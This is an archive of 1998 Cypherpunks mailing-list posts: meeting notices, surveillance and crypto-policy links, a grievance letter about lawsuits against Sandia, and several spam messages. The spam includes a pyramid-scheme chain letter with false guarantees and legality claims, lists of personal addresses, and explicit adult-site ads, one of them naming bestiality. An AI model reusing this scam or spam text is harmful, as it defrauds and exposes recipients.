bought your CD. It was the best $29.95 I ever spent! 
I was "lucky"with three girls already, after playing Sensations(r) for each of them on dates. Were they
turned-on by my clothes or how I smelled? I'm not kidding myself--it was Sensations that changed my
luck. Please let me know when the next volume of your CD comes out. I want it. 
                                                                                      Bob Theut.
                                                                                     Dayton, OH

If you have any questions or will like to order Sensations please call 1-800-409-8302 ext.1256
  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 11 Mar 1998 17:07:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: House of Commons Library on US Sigint in Europe
Message-ID: <1.5.4.32.19980312010926.0072ccec@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Hossack has sent us a copy of a letter to Oliver Heald 
MP (UK) from the House of Commons Library on US signals 
intelligence in Europe, with focus on Menwith Hill. It is an answer 
to Mr. Heald's request for information on the charge of US 
spying in the STOA report as described by Duncan Campbell 
and Nicky Hager.

The letter documents successive parlimentary and journalistic 
inquiries about the USA/UK 50-years-long arrangement for joint 
intelligence and HMG's answers.

   http://jya.com/hoc-ussigint.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "yoji fujita" <tonton9@pp.iij4u.or.jp>
Date: Wed, 11 Mar 1998 05:26:05 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <000a01bd4cf1$244876c0$563582d2@fwhc6895>
MIME-Version: 1.0
Content-Type: text/plain








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 11 Mar 1998 22:58:43 -0800 (PST)
To: cryptography@c2.net
Subject: ANNOUNCE: March Bay Area Cypherpunks Meeting Saturday March 14, 12-6pm
Message-ID: <3.0.5.32.19980311225235.0089c660@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The March Bay Area Cypherpunks meeting will be held
Saturday, March 14th, at Network Associates in Menlo Park.
Time - 12 noon hang out, 1-5 program, followed by dinner nearby, various evening parties

Agenda:
	Ian Goldberg's HINDE algorithm
	Reports from FC98 Anguilla Financial Cryptography conference
	Reports from Computers, Freedom, and Privacy CFP 98
	Open PGP status discussion
	Work in progress

Location:
	Network Associates, Inc
	Total Network Security division (formerly PGP, Inc)
	4500 Bohannon Drive, Menlo Park

Directions to NAI:

Take 101 (from North or South)
Exit at "Marsh Road/Atherton"
Go West (young man) off exit (right exit lane coming south from SF).
Turning to the West (away from the Bay / freeway)
Get in Left lane immediately.
Turn Left at very first light (Scott Drive, not far from freeway exit)
 (landmark: Shell gas station is on your right as you turn left)
Go South on Scott ~2/3 mi (parallel to 101 freeway fence).
Pass one Stop sign (do not turn yet).
 (landmark: Sun Microsystems has an office on the right)
Scott curves to right, becomes Bohannon Drive.
Turn left into first driveway: "Menlo Oak" Business Park
Go straight through parking lot ~2-300 yds
Curve 270 degrees around Fountain (effective left turn)
#4500 is on left as you curve around fountain.
Go down ~50 yds to main lobby entrance (south side of building).

Ask reception for Dave Del Torto (call 415.730.3583 cel if any problem).
Meeting room is behind reception area through first door on left.

Known or Suspected Parties:

Sandy's Masquerade in or near Oakland
PENSFA at Jim & Heather's in Campbell
"It's Green" filk-oriented potluck in San Jose (afternoon/evening)

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: richardh@cwsredlands.com
Date: Wed, 11 Mar 1998 23:03:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: San Bernardino... New Technology !!
Message-ID: <199803120703.XAA18282@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello  

A major business announcement will take place in San Bernardino, California 
this week !!!  If you have ever wanted to be on the INSIDE when such an 
event was about to occur, E-mail me back for complete details.  

Once you know what is happening, YOU WILL want to be IN ON IT, even 
if you can't be there !!!  

Hit reply, and put "insider details" in the subject line.

Thank you & take care, Richard







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 11 Mar 1998 15:24:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Only In Anonymous...
Message-ID: <199803112324.AAA16722@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> 
> There's nothing wrong with satire, but people ought to mark it as such,
> when posting to a list filled with weak-minded and ideologically
> blinded individuals. 

  I've long said the same thing about the purported 'news' stories
carried by the mainstream press, but the replies I have received from
the news giants merely state that their office gang all had a good
laugh over my 'satire'.
  Until the mainstream press begins marking their articles with such
labels/disclaimers as 'half-truth'/'politically-biased'/'government-
handout'/'self-serving'/'total-bullshit', etc., then I see no reason
to require such labeling by individual netizens who may well be doing
nothing more than writing the news of the near-future.

You go cut wood, carry water--chop, chop, splash, splash...

ZenRacistMonger





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 12 Mar 1998 07:58:29 -0800 (PST)
To: newshour@pbs.org
Subject: distribution
Message-ID: <35080491.A41@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Thursday 3/12/98 7:34 AM

Certified - Return Receipt Requested

Cynthia McKinney

124 Cannon Building
Washington, DC 20515
Office: (202)225-1605
Fax: (202)226-0691
http://www.house.gov/mckinney/

Dear Representative McKinney:

PURPOSE of this letter is to ask your help for us to obtain copes of 
docket sheets from the Tenth Circuit Court of Appeals for cases 
No. 94-2205, Payne v Sandia and 95-2204, Morales v Sandia.

All of our legal efforts to obtain these documents, which any citizen
has a right to, have failed.

REASON you are selected to help is that you appear to be knowledgeable
about operation of the current US federal government and willing to
speak 
out in an attempt to solve problems.

You appeared Friday February 27, 1998 on  PBS, The NewsHour with Jim 
Lehrer, along with senators Campbell, Hollings, Lott, Shelby Robb and 
representatives Dana Rohrabacher and Harold Rogers.

These senators and congressmen appeared not to support your views
because
they are either mis- or not well-informed about US involvement in
support 
of Saddam Hussein.

Stories supporting your view appear on Internet at

  NSA, Crypto AG, and the Iraq-Iran Conflict by J. Orlin Grabbe
  http://www.aci.net/kalliste/speccoll.htm

and

 Crypto AG: The NSA's Trojan Whore? by Wayne Madsen
 http://caq.com/CAQ/caq63/caq63madsen.html

Madsen begins

   It may be the greatest intelligence scam of the century:
   For decades, the US has routinely intercepted and
   deciphered top secret encrypted messages of 120
   countries

But NSA , and as a result the US federal government, apparnetly 
got caught involved in complicity of deaths of about 500,000 Iranians.

This is the subject of a Federal lawsuit seen on Internet at

   http://jya.com/whpfiles.htm
  
US federal government help of Iraq during the Iraq-Iran war may 
possibly backfire on innocent US citizens.

The Wall Street Journal, March 10, 1998, pp. B1, B9. reports

   A Peek Inside a Giant Germ Warehouse 

   By Rochelle Sharpe

   Rockville, Md. -- They keep anthrax bacteria in the
   basement of a faded red-brick building here.

   It isn't far from the yellow-fever virus, the botulism
   bacteria and some of the hundreds of organisms that cause
   the common cold. In fact, there are samples of 85,000
   different fungi, viruses, cells, genes and bacteria here at
   the American Type Culture Collection, by far the largest of
   the 450 repositories of biological materials scattered
   around the globe. ...

   The ATCC legally shipped 10 vials of anthrax, botulism and
   other deadly substances to Iraqi scientists in the 1980s --
   when the U.S. and Iraq were on much friendlier terms -- all
   with the Commerce Department's approval. ...

   http://www.jya.com/btn031198.txt

The US federal government apparently intended these bioweapons to 
be used against the people of Iran.

You demonstrated on PBS TV a quality identified by Francis Bacon

         The contemplation of things as they are,
                without error or confusion,
            without substitution or imposture,
   is in itself a nobler thing than a whole harvest of invention.

by your statement about Saddam Hussein on PBS

                ...our man and our creation...

Perhaps after reading the above materials and

   The Problem of Paradigm Shifts - Terrorism and the 
   Threat From Weapons of Mass Destruction in the Middle East
   Working Draft Anthony H. Cordesman, Senior Fellow and 
   Co-Director Middle East Studies Program October 22, 1996

  http://www.csis.org/mideast/terror.html

senators Campbell, Hollings, Lott, Shelby, Robb and representatives 
Dana Rohrabacher and Harold Rogers MAY NOW understand why you are 
correct and they are mis- or not well-informed about US involvement 
with Saddam Hussein.

PROBLEM we face with the US court system is that court clerks and judges
have committed Title 18 felony violation of law IN WRITING in an attempt
to deny us monetary compensation due us for the cases WE WON at the 
Tenth Circuit on Appeal.  

But judges awarded victories to the US federal government in violation 
of Federal Rules of Appellate Procedure.

Cases  No. 94-2205, Payne v Sandia and 95-2204, Morales v Sandia 
were both won pro se on appeal.

We have filed a writ of mandamus with supreme court judge 
Scalia in an  attempt to get the docket sheets for the two above 
cases.

But Scalia will not answer our certified letters.

Senator McCain wrote Payne on December 23, 1997

  I wanted to take this opportunity of than you for you letter of 
  December 3, 1997. 

  Your situation is in the jurisdiction of Senator Pete Dominici.  
  Therefore, I have  forwarded you letter to his attention.

  William, I hope you situation can be resolved favorably.

Lawyers and politicians Dominici and Bingaman are part of a 
problem not a solution.

Dominici and Bingaman have the following agenda

  University of New Mexico Bureau for Business and Economic
  Research reported on October 14, 1997: 

  A  The Gross State Product of New Mexico is $37.8 billion.

  B  The US Federal government sends $11.3 billion to New Mexico
      each year.

  C  For each $1 New Mexico sends to Washington, New Mexico gets 
      $2 back.

THEREFORE, Representative McKinney, we ask your help to get copies
of the docket sheets.

Citizens of the US are becoming more upset with the behavior of 
bureaucrats, the courts [lawyers], and the US federal government. 

Some Americans have no other way to express their dissatisfaction
with US federal government mismanagement of our country except
by violence.

Frederick Douglass either wrote or said on  August 4, 1847

          Those who profess to favor freedom,
            and yet depreciate agitation
   are men who want crops without plowing up the ground.
      They want rain without thunder and lightening.
         Power concedes nothing without a demand.
            It never did, and it never will.
       Find out just what people will submit to
        and you have found out the exact amount
  of injustice and wrong which will be imposed upon them.
      These will continue until they are resisted
        with either words or blows, or with both.
          The limits of tyrants are prescribed
       by the endurance of those whom they oppress.

We chose to use the words and law to hold government 
employees accountable.

Please encourage Scalia to do his job. 

Help get us copies of the docket sheets.  

And even perhaps help investigate further and settle this 
American tragedy.


Sincerely,



Arthur R. Morales                William H. Payne
1023 Los  Arboles NW             13015 Calle de Sandias NE
Albuquerque, NM 87107            Albuquerque, NM 87111

Enclosures
1  NSA, Crypto AG, and the Iraq-Iran Conflict by J. Orlin Grabbe
2  Crypto AG: The NSA's Trojan Whore? by Wayne Madsen
3  Swiss Radio International Audio tape, 15 May, 18 July 1994

Distribution
Ben Nighthorse Campbell
  administrator@campbell.senate.gov 
Ernest Hollings
  senator@hollings.senate.gov
Trent Lott
  senatorlott@lott.senate.gov
Richard Shelby
  senator@shelby.senate.gov 
Charles Robb
  Senator_Robb@robb.senate.gov
Jim Lehrer
  newshour@pbs.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 12 Mar 1998 09:15:51 -0800 (PST)
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: ANNOUNCE: March Bay Area Cypherpunks Meeting Saturday March 14, 12-6pm
In-Reply-To: <3.0.5.32.19980311225235.0089c660@popd.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.980312084934.29812B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 11 Mar 1998, Bill Stewart wrote:

> The March Bay Area Cypherpunks meeting will be held Saturday,
> March 14th...followed by dinner nearby, various evening parties
> ...Sandy's Masquerade in or near Oakland...

Guilty as charged, your Honor.  The invitation URL is at:

	http://www.c2.net/~sandy/98mar.htm

Be there or be a parallelogram with sides of equal length and
equal angles.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 12 Mar 1998 05:56:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: FBI CALEA Rule for Electronic Surveillance
Message-ID: <1.5.4.32.19980312135741.006f2a64@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


[Federal Register: March 12, 1998 (Volume 63, Number 48)]
[Page 12217-12310]

SUMMARY: The FBI is providing the Final Notice of the requirements for 
actual and maximum capacity for the interception of the content of 
communications and call-identifying information that telecommunications 
carriers may be required to effect to support law enforcement's 
electronic surveillance needs, as mandated in section 104 of the 
Communications Assistance for Law Enforcement Act (CALEA) 
(Public Law 103-414, 47 U.S.C. 1001-1010).

----------

For full copy:

   http://jya.com/fbi031298.txt  (685K)

Zipped version:

   http://jya.com/fbi031298.zip  (101K)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Thu, 12 Mar 1998 07:26:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: Protection Commander 1.0
Message-ID: <Pine.SOL.3.96.980312102303.25472A-100000@c00954-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



http://www.softcode.se/

Interesting....looks very unsecure though.

Ken Williams

/-| ORG: NC State Computer Science Dept  VP of The E.H.A.P. Corp.   |-\
|   EML: jkwilli2@adm.csc.ncsu.edu       ehap@hackers.com             |
|   WWW: http://www4.ncsu.edu/~jkwilli2/ http://www.hackers.com/ehap/ |
|   PGP: http://www4.ncsu.edu/~jkwilli2/pubkey                        |
\-| Chief weapons of UNIX:  Fear, surprise and ruthless efficiency. |-/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Thu, 12 Mar 1998 13:41:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: new on Peacefire: TracerLock search monitor service (fwd)
Message-ID: <Pine.SOL.3.96.980312164017.10561A-100000@c00954-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Ken Williams

/-| ORG: NC State Computer Science Dept  VP of The E.H.A.P. Corp.   |-\
|   EML: jkwilli2@adm.csc.ncsu.edu       ehap@hackers.com             |
|   WWW: http://www4.ncsu.edu/~jkwilli2/ http://www.hackers.com/ehap/ |
|   PGP: http://www4.ncsu.edu/~jkwilli2/pubkey                        |
\-| Chief weapons of UNIX:  Fear, surprise and ruthless efficiency. |-/


---------- Forwarded message ----------
Date: Thu, 12 Mar 1998 16:10:09 -0500
From: bennett@peacefire.org
To: peacefire-broadcast@vorlon.mit.edu
Subject: new on Peacefire: TracerLock search monitor service

[You are receiving this after signing up for membership in Peacefire at
http://www.peacefire.org/join/.  To unsubscribe yourself from this list and
cancel your Peacefire membership, see unsubscription instructions at the
end of this message.]

*******************************************************

"They set 'em up. We knock 'em down. And here we are again."

	-Emily Whitfield, national ACLU spokeswoman, on the
	Internet censorship bill recently passed in New Mexico

Even though the Communications Decency Act was struck down by the Supreme
Court in the summer of 1997, New Mexico has just passed their own statewide
version of the infamous Internet censorship law.  Senate Bill 127, recently
signed by the governor of New Mexico, makes it illegal to place information
"harmful to minors" on the Internet where a person under 18 would be able
to access it.  The EFF and the ACLU have said they will fight the law in
court; the ACLU has already won lawsuits to overturn similar laws in four
other states.

If you know someone living in New Mexico, or if you live in New Mexico, we
need your help!  Peacefire is creating a "civil disobedience" page for
Internet users to protest the New Mexico law.  By filling out a form on our
Web site, a user will be able to click a button and automatically send a
Bible verse that mentions sex, or an excerpt on birth control from the
plannedparenthood.org Web page, to a Peacefire member under 18 living in
New Mexico.  These are the type of materials that would violate the
Communications Decency Act and New Mexico's S.B. 127.  Although the
volunteer living in New Mexico can simply delete the messages as they
arrive, it will still count as an act of civil disobedience for the user to
fill out the form that causes the message to be transmitted.

Please help us find someone living in New Mexico who could volunteer to
receive the automatic e-mails and delete them.  The number of e-mails
should be small (less than 10 per day), and they will all have the same
identical subject line so they will be easy to recognize and delete.  (If
the number of e-mails grows beyond that, we can have several volunteers.)

More online coverage of the New Mexico law:
http://www.news.com/News/Item/0,4,19859,00.html

	-Bennett

---

To leave Peacefire and unsubscribe yourself from this list, send a message
to "majordomo@vorlon.mit.edu" with the message body:
        unsubscribe peacefire-broadcast
Please note that the only requirement for being a member of Peacefire is to
remain subscribed to peacefire-broadcast, but if you unsubscribe from this
list you will no longer be a member.

bennett@peacefire.org   (615) 421 6284   http://www.peacefire.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cindy Cohn <Cindy@mcglashan.com>
Date: Thu, 12 Mar 1998 20:03:57 -0800 (PST)
To: bernstein-announce@toad.com
Subject: Senate Cmte to hear Testimony About Bernstein Case
Message-ID: <199803130338.TAA18807@gw.quake.net>
MIME-Version: 1.0
Content-Type: text/plain


The Senate Judiciary Committee's Subcommittee on the Constitution,
Federalism, and Property Rights will hear testimony from  Cindy Cohn, lead
counsel in the Bernstein case on March 17, 1997.  

The hearing, entitled "Privacy in the Digital Age: Encryption and Mandatory
Access," will begin at 10:00 a.m. in Room 226 of the Dirksen Senate Office
Building.  The Subcommittee is chaired by Senator John Ashcroft of Missouri.  

Ms. Cohn will discuss the Bernstein case as well as the inherent
constitutional problems raised by the proposals for domestic cryptography
controls.

This will be the first time that the Congressional committees considering
proposed cryptography legislation have heard testimony from those directly
involved in the legal challenges the current regulations.  

The government's appeal of the Bernstein case, which was argued on December
8, 1997, is still pending with the 9th Circuit.  A decision is expected in
the next few months.




******************************
Cindy A. Cohn, Cindy@McGlashan.com
McGlashan & Sarrail, P.C.
177 Bovet Road, 6th Floor
San Mateo, CA 94402
(650) 341-2585 (tel)
(650) 341-1395 (fax)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Thu, 12 Mar 1998 22:15:00 -0800 (PST)
To: JOC@pdx.oneworld.com
Subject: Re: get me off
In-Reply-To: <199803130345.TAA27091@iceberg.pdx.oneworld.com>
Message-ID: <3508CDBD.6150@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


JO COOPER wrote:
> I
> cannot get off

http://www.studiousanonymous.com/
Studios Anonymous - adult explicit site features: bestiality, 
transexuals, lesbians, young girls, gays, masturbaters,
cocksuckers, ass pounders, beautiful asses, huge tits, dogs, horses, 
chimps, cows.

> Thank you
You're welcome





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: remove <remove@pinkxxx.com>
Date: Sun, 15 Mar 1998 10:11:07 -0800 (PST)
To: user@yahoo.com
Subject: 100% FREE SITE for ADULTS ONLY!
Message-ID: <8154564_58873704>
MIME-Version: 1.0
Content-Type: text/plain





*** REMOVAL instructions are located at the bottom of this email ***





This ADULT NEWS FLASH is intended for MATURE AUDIENCES ONLY!

Visit this year's ADULT PORN PRESS  "FREE ADULT SITE OF THE YEAR"

300+ FREE PICS!     
300+ FREE VIDEOS ROTATING DAILY!
HARDCORE PUZZLE GAMES AND MORE!

THIS NEW SITE IS 100% FREE, CUM NOW!

http://www.pinkxxx.com/CREAMERS/




Thank you for your support!

Suzie.














*** REMOVAL instructions ***


This mailing list is filtered through http://remove-list.com

As well, to be removed from our internal mailing list please
REPLY typing REMOVE in the SUBJECT BOX. 

You will NOT be emailed again about this matter. We represent
an ebusiness network of private adult entertainment organizations
trying to keep the word "FREE" a REALITY on this virtual world.

 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 12 Mar 1998 22:03:15 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: Fortify
Message-ID: <199803130603.HAA04734@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Tthe remarkably hackable nature of  Netscape's "weak" crypto has been marveled
at here and in the press, but has no one else speculated on how this state of
affairs came to be?  I, for one, would like to thank the anonymous cypherpunks
toiling in the bowels of Netscape.  An amazing feat, achieving world-wide
distribution of millions of copies of strong crypto, the Feds all unknowing.  
Does anyone here _not_ think this was the deliberate act of one or more
cryptoanarchists?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "JO COOPER" <joc@pdx.oneworld.com>
Date: Thu, 12 Mar 1998 19:46:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: get me off
Message-ID: <199803130345.TAA27091@iceberg.pdx.oneworld.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello- ANYONE!!!
Please, my young son subscribed me to this -whatever you are- and I 
cannot get off- I do not want any e-mail from you.  Can I please get 
instructions as to how to stop this?
Thank you




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lauke31@prodigy.com
Date: Thu, 12 Mar 1998 23:12:16 -0800 (PST)
To: lauke31@prodigy.com
Subject: "Make your Mailbox an ATM Machine"
Message-ID: <19980313674HAA23717@post.erzwiss.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#00ffff">

 <FONT  COLOR="#ff0000" SIZE=5><B>MAKE YOUR MAILBOX YOUR CASH ATM    
                        MACHINE!
                                                                              </FONT><FONT  COLOR="#000000" SIZE=3></B>
          <FONT  COLOR="#8000ff" BACK="#00ffff" SIZE=3> Immediately Make a Copy of this Letter, <B>PRINT IT SAVE</B>
           and <B>READ</B> again. I received this Letter 3 times before I decided
           to try it. I beat up on my self for not joining this group sooner

    ===<B>Add your Name the our Mailing List and start Receiving Cash!===</B>
</FONT></FONT><FONT  COLOR="#000000" BACK="#FFFFFF" SIZE=3>
Greetings:
Hopefully my name is still on the list below. I am a retired attorney and
 about two years ago, a man came to me with a letter. NOTE: This is not 
a chain letter. THIS SERVICE IS 100% LEGAL! (Refer to TITLE 18,
 Section 1302 & 1342 of the U.S. POSTAL and LOTTERY LAWS). 
The letter he brought me is basically the same letter you have in your 
hands. He asked me to verify the fact that this letter was legal to do. 
I told him I would review it and get back to him. When I first read the 
letter my client brought me, I thought it was some kind of off-the wall 
idea to make money. A week and a half later, we met in my office to 
discuss the issue. I told him to make a small change in the letter and it 
would be all right.

I was still curious about the letter, so he told me how it works. 
I thought it was a long shot, so I decided against participating, 
but before my client left, I asked him to keep me updated as to his
result. About two months later he called me to tell me <B>HE HAD</B> 
<B>RECEIVED OVER $800,000.00 IN CASH</B>. I didn't believe him, so 
he asked me to try his idea and find out for my self. I thought about it
for a couple days and decided I didn't really  have anything to lose, 
so I asked him for a copy of the letter.  I followed the instructions
exactly, mailed out 200 copies, and sure enough, the money started
arriving!  It came slowly at first, but after about three weeks, I was 
getting more mail  than I could open in a day. After about  three 
months the money stopped  coming. <B>I KEPT PRECISE RECORDS 
OF THE EARNINGS AND AT THE END, IT TOTALED $868,494.00!</B>

I was earning a good living as a lawyer, but anyone in the legal profession 
will tell you, there is a lot of stress that comes with the job. I told myself
 if  things  work out, I would retire from the practice and play golf. I
decided
to try the letter again, but this time I sent 500 letter out. Well, three
months 
later, <B>I HAD TOTALED $2,344,178.00</B> ! I just couldn't believe it. I met my 
old client for lunch to find out how it worked. He told me there are quite a 
few similar letters going around. <B>WHAT MAKES THIS ONE DIFFERENT
IS THE FACT THAT THERE ARE SEVEN NAMES INSTEAD OF FIVE </B>
<B>LIKE MOST OTHERS.</B>  That fact alone results in your name being on far 
more return. The other factor was the help I gave him in making sure the 
whole thing was  perfectly legal, since nobody wants to risk doing something 
illegal.

I'll bet by now you are curious to know what little change I told him to make.
Well, If you sent a letter like this out, to be legal, you need to actually
sell 
something if you expect to receive a <B>DOLLAR</B>. I told him anyone sending 
a dollar  back to him must receive something in return. So, when you send a
dollar to each  of the seven people on the list, you must include a slip of
paper 
with the words:  "Please put me on your mailing list", include your, name,
mailing address, e-mail optional... 

<FONT  COLOR="#ff0000" SIZE=3><B>THIS IS THE KEY TO THE PROGRAM!!  THE ITEM YOU WILL RECEIVE
 FOR THE DOLLAR YOU SEND TO THE SEVEN NAMES IS YOUR NAME 
ON THEIR MARKETING LETTER AND THE RIGHT TO EARN THOUSANDS ! !
</FONT><FONT  COLOR="#000000" SIZE=3></B>

   Follow the simple instructions below exactly, & in less than three months,
    you will receive over<B> $800,000.00 GUARANTEED!!!!!!!!
</B>
1. Immediately send $1.00 to each of the seven people on the list below, 
    wrap a dollar in a note saying, "Please add me to your mailing list" 
    and include your name, mailing address , optional e-mail address.

2. Remove the names in the #1 position on the list and move the rest of
     the names up one position. Then place your name in the #7 position.  
     This is best done by saving this to a text file and editing it yourself
     and saving the new edited copy. Or  typing a new list, (Only the names)
     taping or gluing over  the old ones.  Or by.  Be very careful when you type 
     the address and proof read them.

 
<FONT  COLOR="#800000" SIZE=3><B>1. G. Paul, 314 Sidney Martin St., Lafayette, LA 70507
2. I.A. Goodspeed, 33080 Brockway St, Union City, CA 94587 
3. M. Alfred, P.O. Box 33366, San Antonio, Texas 78265
4. Ophelia Williams, 1250 E. Alexander St, Lafayette, LA 70501 
5. Ed.. Bronsc, 9824 South Western Avenue  #321, Evergreen Park, IL 60805
6. ABC Sales, 12541A South Western, Box 4, Blue Island, IL 60406
7. S. Andrews, 89 Park Street, Rear Building #2, Montclair, NJ  07042
</FONT><FONT  COLOR="#000000" SIZE=3></B>

3. When you have completed the instructions, you have the option of mailing 
    your New Letter out in two ways: (1) by e-mail or  (2)Through the 
    U.S. Postal Service.  Either way will bring big payoffs. This letter has
    been proven perfectly legal for both ways as long as you follow the above
    instructions, because you are purchasing membership in an exclusive 
    mailing list. 

To mail this out over the Internet,.  All you have to do is order several
hundred thousand e-mails from a provider like the one below. Also you can go to the
members directory in AOL and there you can collect thousands of names for 
free.  However, you will need a utility to collect these names from AOL. As 
a Member of AOL, go the Keyword, there is a free software utility under BPS 
software called Power tools. This will allow you to cut and paste e-mails .
 Remember it does not cost anything to mail on the Internet.  Or you can get 
a Mass Mail Network to mail it out in large  volumes for you.  We highly
recommend this one.  They always email more  than you purchase and their 
 address are fresh.  Mail this letter to them with your name and address in
the  Position # 7 above.  A good one to use is:

Global Frontiers Marketing
732-728-0064
They are fair and do a good job of mailing to lots of internet providers.

4. We have a Fresh List of AOL Email address ready to use. These  addresses 
    are downloaded weekly. 50,000 AOL E-mail addresses $7.50; 100,000/ $10.00
    you also get a Free Mailer with and order of 100,000 e-mails
    These addresses are on 3 .5  Disk.
          Ebran Marketing
          9824 South Western
          Suite 321
          Evergreen Park, IL 60805
5. If you are going to use the traditional U.S. Postal Service to do this 
     program, you will want to make copies of this letter at a copy center
      (kinkos copy service) and  order a minimum of  500 names (1000 is best)
       from a mailing list company.

Ebran Marketing, 9824 S. Western Ave, Suite 321, Evergreen Park, IL 60805
     500/ $15.00    1000/ $20.00

These two also have effective lists:
     Avon Distributors ~ P.O. Box B11 ~ Shelly, ID 83274 ~ (800) 992-3866
      DataLine ~ P.O.Box 7348 ~ Omaha, NE 68107 ~ (800)497-2912

(A) While waiting for you list to arrive, place your copies in envelopes, 
stamp, and seal them. <B>DO NOT PUT YOUR RETURN ADDRESS ON</B>
<B>THE ENVELOPES! </B>This will only pique the curiosity of the receiver.
 (B) When your mailing list arrives, place a label on each of your
envelopes and drop them in the mail box. Within 90 days, you will receive
over $800,000.00 in cash !!! * Keep a copy of this letter so you can use
 it a second time. Mail it out again in about six months but mail it to the
addresses you receive with each dollar. It will work again, only much better!

<B>BE SURE TO MAIL $1.00 TO EACH OF THE NAMES ON THE LIST 
ABOVE.  INTEGRITY AND HONESTY WILL MAKE THIS PLAN WORK. </B>
And together <B>WE WILL ALL PROSPER.</B>

Here's how the system works: Assume for example you get a 7.5% return rate,
which is very conservative. My first attempt was about 9.5% and my second
was over 11%.
1.When you send out 200 letters, 15 people will send you $1.00 = <B>$15.00 </B>
2.Those 15 mail out 200 letters each and 225 people send $1.00 =<B>$225.00</B>
3.Those 225 mail out 200 letters each and 3,375 people send $1.00=<B>$3,375.00</B>
4.Those 3,375 mail out 200 letters each and 50,625 people send
$1.00=<B>$50,625.00 </B>
5.Those 50,625 mail out 200 letters each and 759,372 people send
$1.00=<B>$759,372.00</B>

At this point your name drops off the list...but so far you have 
received <FONT  COLOR="#ff0000" SIZE=3><B>$813,612.00</FONT><FONT  COLOR="#000000" SIZE=3></B>

It works every time, but how well depends on how many letters you send
out. In the example above, you mailed out 200 letters, if you had mailed
out 500 letters, you would have received over $2,00,017.
NOW, just think if you send out 50,000 to 100,000 e-mails and you only get
1.5 to a 3% response and each person responding send out another 50,000 to
100,000 with the 1.5 to 3% response.  Now you see you can easily reach the
$800,000 plus with little effort on your part. (Check the Math Yourself)

 With this kind of possible return, you have got to try it.Try it once and you
will do it again!!!!.  Just make sure you send a <B>DOLLAR </B>to each of the seven
 names on the list with a note to be added to their mailing list. Follow the
above
 instructions exactly, you will have <B>SUCCESS!!!!!!</B>

PS: You have read this far, so let me ask you one simple question:
     What do you have to loose?
     Just $7.00, but with a little effort on your part, you can gain over
$800,000

<B>EVERYBODY ON THE LIST NEEDS EVERYBODY'S HELP. 
</B>
<B>TRY IT NOW ! ! </B>Place your name on our mailing List by sending your $1.00 
to each of the 7 names above today.

Within about 14 days you will need help counting your $1.00 bills






























<FONT  COLOR="#0f0f0f" BACK="#fffffe" SIZE=3>

</PRE></HTML




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Thu, 12 Mar 1998 15:39:05 -0800 (PST)
To: (Recipient list suppressed)
Subject: Pauline Hanson hits Sydney
Message-ID: <1.5.4.32.19980312222322.006f2648@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


Here is an excellent opportunity for Pauline Hanson supporters in New South
Wales to come meet and hear Australia's best known politician.
